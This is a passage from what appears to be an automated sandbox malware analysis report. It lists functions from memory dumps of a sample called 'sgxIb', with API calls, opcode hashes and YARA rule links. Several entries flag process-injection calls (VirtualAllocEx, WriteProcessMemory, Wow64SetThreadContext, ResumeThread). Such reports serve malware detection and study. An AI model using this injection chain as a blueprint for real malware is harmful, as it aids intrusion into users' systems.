                                                    Function 00EFB298 Relevance: 1.7, APIs: 1, Instructions: 205COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1922038730.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_ef0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7e4d7d92aa39e1d4b30f19ac81443e747478611f083dd49ca98aa658cfda6a8f
                                                    • Instruction ID: 2a4d47ae563ab249fcb679aa136fd926322105b4ad034e456f9d9d243c9a3f0f
                                                    • Opcode Fuzzy Hash: 7e4d7d92aa39e1d4b30f19ac81443e747478611f083dd49ca98aa658cfda6a8f
                                                    • Instruction Fuzzy Hash: 19816970A00B098FD724DF29D4457AABBF1FF88304F109A2DD18AEBA50D774E845CB90
                                                    Function 00EF592D Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 00EF59E9
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1922038730.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_ef0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 600ddbf40fd4d111cdebd967d4977f886f271ab712630d46b04727552ba8d5d0
                                                    • Instruction ID: a0fe8eed70e8a49c4e69b7e65ed5f58656017a29fa23d43a92602878e7e40cab
                                                    • Opcode Fuzzy Hash: 600ddbf40fd4d111cdebd967d4977f886f271ab712630d46b04727552ba8d5d0
                                                    • Instruction Fuzzy Hash: 2341F1B1C00B1DCFDB24CFA9C884A9EBBB5BF58304F2481AAD508BB251DB756945CF90
                                                    Function 00EF4508 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 00EF59E9
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1922038730.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_ef0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 391353d3b2ac130edb3776c3fb16d96702d0bcfed6f3e89c46b0831e9efcd977
                                                    • Instruction ID: 533282ae71279869257347f84c00cc917bb48d05d59da6337d5e56897f7c1bcb
                                                    • Opcode Fuzzy Hash: 391353d3b2ac130edb3776c3fb16d96702d0bcfed6f3e89c46b0831e9efcd977
                                                    • Instruction Fuzzy Hash: E241D0B1C00B1DCBDB24CFA9C884B9EBBB5BF48304F2481AAD509AB255DB756945CF90
                                                    Function 06BCBFF0 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1936970830.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_6bc0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID: CreateFromIconResource
                                                    • String ID:
                                                    • API String ID: 3668623891-0
                                                    • Opcode ID: 33568a0c94151e45360fe93d7d34ebebdabd75dda947ef2c3600153f2c07581c
                                                    • Instruction ID: 3a5941e8df734f20cb128d3a97c6ef57da53e19a5b182d79433c4c4ab73bf1fc
                                                    • Opcode Fuzzy Hash: 33568a0c94151e45360fe93d7d34ebebdabd75dda947ef2c3600153f2c07581c
                                                    • Instruction Fuzzy Hash: 18318DB29043589FCB11DFA9D844ADEBFF8EF09310F14809AF554A7221C3359950DFA1
                                                    Function 06E9E7C1 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06E9E858
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1937302056.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_6e90000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: b3b33e65e32debcc1026948eb5898813fb4b6904676688503aaa4d88f174d124
                                                    • Instruction ID: 1017a191a4a6bc77bca376f2425d358ebd13a76365db39f693acd87f061a1f13
                                                    • Opcode Fuzzy Hash: b3b33e65e32debcc1026948eb5898813fb4b6904676688503aaa4d88f174d124
                                                    • Instruction Fuzzy Hash: F92137B1900349DFCB10CFAAD885BDEBBF5FF48310F14842AE958A7241C7749954CBA4
                                                    Function 06BCA2B9 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 06BCA357
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1936970830.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_6bc0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID: DrawText
                                                    • String ID:
                                                    • API String ID: 2175133113-0
                                                    • Opcode ID: 5cbfc4d6eb67dabb474f6b6a865b5e4be6a389dee842c241342053f0e299c99a
                                                    • Instruction ID: 82b9ca44e00e55be3ae4d74f38010dc5a93973d1831857746f5c0374c4df12e0
                                                    • Opcode Fuzzy Hash: 5cbfc4d6eb67dabb474f6b6a865b5e4be6a389dee842c241342053f0e299c99a
                                                    • Instruction Fuzzy Hash: EB31C0B5D002499FDB10CFAAD884ADEFBF4FB48320F14846EE919A7210D775A944CFA4
                                                    Function 06BCA2C0 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 06BCA357
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1936970830.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_6bc0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID: DrawText
                                                    • String ID:
                                                    • API String ID: 2175133113-0
                                                    • Opcode ID: 5301d5242716a6be09dc7c0316b936baf2802c3a18c2912c1d31feed9638a5df
                                                    • Instruction ID: 6994458b41bf52a06db9c522f11418774ddc7c67f1d8e2e194752bbd878661ac
                                                    • Opcode Fuzzy Hash: 5301d5242716a6be09dc7c0316b936baf2802c3a18c2912c1d31feed9638a5df
                                                    • Instruction Fuzzy Hash: A721BFB5D002499FDB10CF9AD884ADEFBF5FB48320F14846EE919A7210D775AA44CFA4
                                                    Function 06E9E628 Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06E9E6AE
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1937302056.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_6e90000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: e26789aba411d268ea88fd0b59e024ea20f6b92d880b4cb687b066db3aa01d2e
                                                    • Instruction ID: 7eb2691f27c2d8b5f21b32ee650d0deeed1212e3cf0517cf77b4b79c0af39170
                                                    • Opcode Fuzzy Hash: e26789aba411d268ea88fd0b59e024ea20f6b92d880b4cb687b066db3aa01d2e
                                                    • Instruction Fuzzy Hash: D6213971900309DFDB10DFAAC485BEEBBF4EF48324F14842AD559A7241CB78A985CFA5
                                                    Function 06E9E7C8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06E9E858
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1937302056.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_6e90000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: ce43be5cf90d7101b0068854ec8a646b945a61467522044367ad6b0abb8e9a1a
                                                    • Instruction ID: 47d7e237cd3cff01cf1598f9d4853fd37a2d245002fb06b5958ff0c8c4783db6
                                                    • Opcode Fuzzy Hash: ce43be5cf90d7101b0068854ec8a646b945a61467522044367ad6b0abb8e9a1a
                                                    • Instruction Fuzzy Hash: 142144B19003099FCB10CFAAC885BDEBBF5FF48310F10842AE958A7240C778A944CBA4
                                                    Function 06E9E8B1 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06E9E938
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1937302056.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_6e90000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: d38348e387c9a00f89dd73818e3d441206cf51e36c2cccbbc3d0a809e38b562e
                                                    • Instruction ID: 7622c2ed4d994d1c513e0f07d393a165bf62985e67c1fefb8b038075d3d0b245
                                                    • Opcode Fuzzy Hash: d38348e387c9a00f89dd73818e3d441206cf51e36c2cccbbc3d0a809e38b562e
                                                    • Instruction Fuzzy Hash: 322136B1800359DFCB10CFAAC885AEEFBF5FF48324F50842AE559A7250C7759941CBA5
                                                    Function 00EFD780 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EFD80F
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1922038730.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_ef0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 9182a466d267824d79829fdb966d3ba4ca1d2d3a233087245f292bd324e3d45d
                                                    • Instruction ID: e8fd5e1ff009acb2b104374eca5c22f9c181f07c5e30e54377c4b94f4cd994f3
                                                    • Opcode Fuzzy Hash: 9182a466d267824d79829fdb966d3ba4ca1d2d3a233087245f292bd324e3d45d
                                                    • Instruction Fuzzy Hash: 7B21E5B5900248DFDB10CFAAD985AEEBFF5FB48320F14845AE954B7210D375A945CF60
                                                    Function 06E9E630 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06E9E6AE
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1937302056.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_6e90000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: a18730b511f65f5711dcf585b2f8d425860945d601c870a702e225ae8f7c6c05
                                                    • Instruction ID: 641f6797940937e2c8ae1f86f64d22a9bae25f83e39d692d1f9cd8bdf6558eb3
                                                    • Opcode Fuzzy Hash: a18730b511f65f5711dcf585b2f8d425860945d601c870a702e225ae8f7c6c05
                                                    • Instruction Fuzzy Hash: 702138B1D003098FDB10DFAAC4857EEBBF4EF88324F148429D559A7241CB789944CFA5
                                                    Function 06E9E8B8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06E9E938
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1937302056.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_6e90000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: 901977abfce915b00d4930a2a3b5b77e628c1c6f8a59703ac76b66a3dc9d64d6
                                                    • Instruction ID: f664adb7ce362b5faa7e4838ebb7b222c790e309feb09f8fcaa0ce0d9c0adad2
                                                    • Opcode Fuzzy Hash: 901977abfce915b00d4930a2a3b5b77e628c1c6f8a59703ac76b66a3dc9d64d6
                                                    • Instruction Fuzzy Hash: 472148B18003599FCB10CFAAC844ADEFBF5FF48320F108429E558A7250C7749940CBA4
                                                    Function 00EFD788 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EFD80F
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1922038730.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_ef0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: b52e72a38b17a9d2070792c2c170fa535be4a71c1e4b30cc38c50d2918405f36
                                                    • Instruction ID: c3a3eaf5470b9cecfac703c6f356b6d44000c2dc7a1162986ef2280583a602c1
                                                    • Opcode Fuzzy Hash: b52e72a38b17a9d2070792c2c170fa535be4a71c1e4b30cc38c50d2918405f36
                                                    • Instruction Fuzzy Hash: F921E4B5900248DFDB10CF9AD984ADEBFF5FB48320F14841AE954A3310D374A944CFA4
                                                    Function 06E9E700 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06E9E776
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1937302056.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_6e90000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 5ceda4b172f37eb54416c0c9732e56eb373a9cf1cea8d9bdf0fdb6f2d7a187e9
                                                    • Instruction ID: f8d0cf2eeafcb62f343cdce14ff287a666cd778dbe91adf8270ca6f3fe6c7e84
                                                    • Opcode Fuzzy Hash: 5ceda4b172f37eb54416c0c9732e56eb373a9cf1cea8d9bdf0fdb6f2d7a187e9
                                                    • Instruction Fuzzy Hash: BC215672800248DFCB10DFAAC844ADEFFF5EF88320F10881AE559A7250C735A590CFA1
                                                    Function 06BCAF40 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,06BCC00A,?,?,?,?,?), ref: 06BCC0AF
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1936970830.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_6bc0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID: CreateFromIconResource
                                                    • String ID:
                                                    • API String ID: 3668623891-0
                                                    • Opcode ID: 5cd0a82284cdbe956cec2e4b9d6c920b0075556e1df827f4703f115029f0c45b
                                                    • Instruction ID: ef44163ec9ce16403766930c0ccf5186f0fd245d57d6be5afcab5b4d9dd39d50
                                                    • Opcode Fuzzy Hash: 5cd0a82284cdbe956cec2e4b9d6c920b0075556e1df827f4703f115029f0c45b
                                                    • Instruction Fuzzy Hash: A5114CB5800349DFDB10CF9AC848BDEBFF8EB48320F14845AE554A7211C375A950DFA5
                                                    Function 06E9E142 Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1937302056.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_6e90000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: 611b4d4c56e36bc5bbd06136bc7bcf1adce79067cef0b4ad304ff5d055e8a20b
                                                    • Instruction ID: 9ec73f27c0ad772c5f436e687b7fbd1d8e2c153b2a5695319a98992134903a07
                                                    • Opcode Fuzzy Hash: 611b4d4c56e36bc5bbd06136bc7bcf1adce79067cef0b4ad304ff5d055e8a20b
                                                    • Instruction Fuzzy Hash: 231149B19003488BCB10DFAAD8457EEFBF4AF89324F20841AD559A7650CA756544CBA5
                                                    Function 06E9E708 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06E9E776
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1937302056.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_6e90000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 654080e5921dd59d6006f68bb8c13399a0bef469352f24a600defff0287d0e29
                                                    • Instruction ID: 8e1bfb6e07810f7f1bb4874fdf6efb17e1b2c93e48d10f38035760adf11edd09
                                                    • Opcode Fuzzy Hash: 654080e5921dd59d6006f68bb8c13399a0bef469352f24a600defff0287d0e29
                                                    • Instruction Fuzzy Hash: F91167718002489FCB10DFAAC844BDEBFF5EF88320F108419E559A7250C775A940CFA1
                                                    Function 06E9E148 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1937302056.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_6e90000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: f077e59c72c461bacf40d2e9985ee41044a81088b0a33ed37718d7adc2d01680
                                                    • Instruction ID: 8ade58ce9e0a49df7d4435d0de29155754325e0213a3636ad3caba583db1ff18
                                                    • Opcode Fuzzy Hash: f077e59c72c461bacf40d2e9985ee41044a81088b0a33ed37718d7adc2d01680
                                                    • Instruction Fuzzy Hash: 741128B19003488BDB10DFAAC8457DEFBF4AF89324F208419D559A7250CA75A944CBA4
                                                    Function 073D2488 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PostMessageW.USER32(?,?,?,?), ref: 073D24ED
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1937864966.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_73d0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: ef879c3721f4f7e8caf6ebd0d505ea9e07136eb25a61b6003b28d7c962c3e021
                                                    • Instruction ID: c537b68ac72022536895330b483900173151717dc06e33a707a3a7a2f293de83
                                                    • Opcode Fuzzy Hash: ef879c3721f4f7e8caf6ebd0d505ea9e07136eb25a61b6003b28d7c962c3e021
                                                    • Instruction Fuzzy Hash: 271125B58003589FDB20CF9AD889BDFBBF8FB48320F108419D958A7200C375A990CFA1
                                                    Function 00EFB498 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00EFB4FE
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1922038730.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_ef0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: fb129e1799977216623a20b883869ebd5fbdf271b01a652b3f787932c9473bec
                                                    • Instruction ID: c1bd3d201b60cc9b176b19f40521e5a6e49101098702725b42468156d8eae1c5
                                                    • Opcode Fuzzy Hash: fb129e1799977216623a20b883869ebd5fbdf271b01a652b3f787932c9473bec
                                                    • Instruction Fuzzy Hash: 961110B5C002498FCB10CF9AC444ADEFBF5AB88324F10846AD569B7210D379A545CFA1
                                                    Function 073D2490 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PostMessageW.USER32(?,?,?,?), ref: 073D24ED
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1937864966.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_73d0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: c635b03ac8cd3e43a1fe13990ac6b238065e7bb3b6b7bf28678e086e29cf0727
                                                    • Instruction ID: 23fd86aa4e38a2a89135f29495d1d60c1acf5f84021d6371592530ef5d27a762
                                                    • Opcode Fuzzy Hash: c635b03ac8cd3e43a1fe13990ac6b238065e7bb3b6b7bf28678e086e29cf0727
                                                    • Instruction Fuzzy Hash: 0A11F2B58002599FDB10DF9AD848BDEBBF8FB48320F108419D558A7200C375A944CFA1
                                                    Function 0745E7B0 Relevance: 1.4, Strings: 1, Instructions: 151COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1938009179.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7450000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: PH^q
                                                    • API String ID: 0-2549759414
                                                    • Opcode ID: eaa24fe58c02d50f91dafd1f4dfd795c0cab9815f2eaf0e74b227910946a9dd4
                                                    • Instruction ID: 3b2a0dec0a65cd04b2ce24116e22c1a83f0f0fbae173a5805dc37906d604ac4c
                                                    • Opcode Fuzzy Hash: eaa24fe58c02d50f91dafd1f4dfd795c0cab9815f2eaf0e74b227910946a9dd4
                                                    • Instruction Fuzzy Hash: 3C517E717042568FDB14CF35C998BAABBB1AF4A704F1581AAE845DF362CB30ED45CB50
                                                    Function 06BCD618 Relevance: 1.3, APIs: 1, Instructions: 64COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,06BCDDB9,?,?), ref: 06BCDF60
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1936970830.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_6bc0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 526b15c66204617918377f74f225678c7bc14f7ae634c11917c844666bd58aa9
                                                    • Instruction ID: 32e01c1ba9451f42a96579f89926bc9709c8652d9996050dc65c9f430940dc73
                                                    • Opcode Fuzzy Hash: 526b15c66204617918377f74f225678c7bc14f7ae634c11917c844666bd58aa9
                                                    • Instruction Fuzzy Hash: AA21CCB18087888FCB11DFA9C4447DEBFF0EF49320F1484AAD598AB252D274A945CBA5
                                                    Function 06BCD644 Relevance: 1.3, APIs: 1, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,06BCDDB9,?,?), ref: 06BCDF60
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1936970830.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_6bc0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: e7c905f50a7aded09081bb17f90990a436449a74842f3a59a1b2642be49310ab
                                                    • Instruction ID: 6e6f98fab7f8b699e9e1ab80ac6d53fbab459d5df1cbedeeddb5301133683943
                                                    • Opcode Fuzzy Hash: e7c905f50a7aded09081bb17f90990a436449a74842f3a59a1b2642be49310ab
                                                    • Instruction Fuzzy Hash: 4C1113B5800249CFCB60DF9AC449BDEBBF4EB48320F108469D558A7250D778AA44CFA5
                                                    Function 06BCDF00 Relevance: 1.3, APIs: 1, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,06BCDDB9,?,?), ref: 06BCDF60
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1936970830.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_6bc0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 27f4f5af3edc7ddb59eabbfdf9e414d15c41297abbf6441fb02f106ade10649b
                                                    • Instruction ID: 81a60d56aeb2497ff5bc0c9f4837e3040110df0557f9e8fa7db85ba990753486
                                                    • Opcode Fuzzy Hash: 27f4f5af3edc7ddb59eabbfdf9e414d15c41297abbf6441fb02f106ade10649b
                                                    • Instruction Fuzzy Hash: 9C1125B5800249CFCB20DF9AD545BDEBBF4EB48320F108469E559A7240D738A984CFA5
                                                    Function 074554D7 Relevance: 1.3, Strings: 1, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1938009179.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7450000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'^q
                                                    • API String ID: 0-1614139903
                                                    • Opcode ID: fa8aaea83ec04211ca652576d10bdceab8513ccf4219afd60ebf23a4bc8390b5
                                                    • Instruction ID: 7a5cc09485ed5a8a4fa2033df600d6ca772b8ab54ab8814826200644355c8770
                                                    • Opcode Fuzzy Hash: fa8aaea83ec04211ca652576d10bdceab8513ccf4219afd60ebf23a4bc8390b5
                                                    • Instruction Fuzzy Hash: 35014F70D04249DFCB44EFB8E59858DBFF2FB44205F1041A9D80A9B315FA346E56CB51
                                                    Function 074554E8 Relevance: 1.3, Strings: 1, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1938009179.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7450000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'^q
                                                    • API String ID: 0-1614139903
                                                    • Opcode ID: f89b3af0c88f66945c616fac1d53e45e7380cc3660ee09116c795dd950deec5c
                                                    • Instruction ID: 05810bc9cc5c61d5b82f050447a81863f5733341de57755787a7bf8f5a61b4b8
                                                    • Opcode Fuzzy Hash: f89b3af0c88f66945c616fac1d53e45e7380cc3660ee09116c795dd950deec5c
                                                    • Instruction Fuzzy Hash: 7FF03130D00209DFCB44EFB8EA9499CBFF2FB44305B5045A9D40597358EB306E558B51
                                                    Function 07453528 Relevance: .2, Instructions: 167COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
